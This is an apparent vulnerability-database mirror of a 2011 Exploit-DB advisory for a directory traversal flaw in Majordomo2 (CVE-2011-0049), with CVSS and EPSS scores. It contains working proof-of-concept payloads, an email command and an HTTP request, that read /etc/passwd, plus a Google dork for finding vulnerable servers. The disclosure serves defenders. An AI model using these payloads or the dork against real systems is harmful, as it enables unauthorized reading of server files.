Lucene search

K
exploitdbMichael BrooksEDB-ID:16103
HistoryFeb 03, 2011 - 12:00 a.m.

Majordomo2 - 'SMTP/HTTP' Directory Traversal

2011-02-0300:00:00
Michael Brooks
www.exploit-db.com
48

6.5 Medium

AI Score

Confidence

Low

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.902 High

EPSS

Percentile

98.7%

Original Advisory: https://sitewat.ch/en/Advisory/View/1
Credit: Michael Brooks (https://sitewat.ch)
Vulnerability:  Directory Traversal
Software: Majordomo2
Identifier:CVE-2011-0049
Vendor: http://www.mj2.org/
Affected Build: 20110121 and prior
Google dork:inurl:mj_wwwusr

Special thanks to Dave Miller,  Reed Loden and the rest of the Mozilla
security team for handling the issue.

This vulnerability is exploitable via ALL of Majordomo2's interfaces.
*Including
e-mail*.  Send an email to majordomo's mail interface (for example:
[email protected]) with the body of the message as follows:
help ../../../../../../../../../../../../../etc/passwd

I'll give you one guess as to the contents of the response email ;).

PoC for HTTP:
http://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd

6.5 Medium

AI Score

Confidence

Low

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.902 High

EPSS

Percentile

98.7%

Related for EDB-ID:16103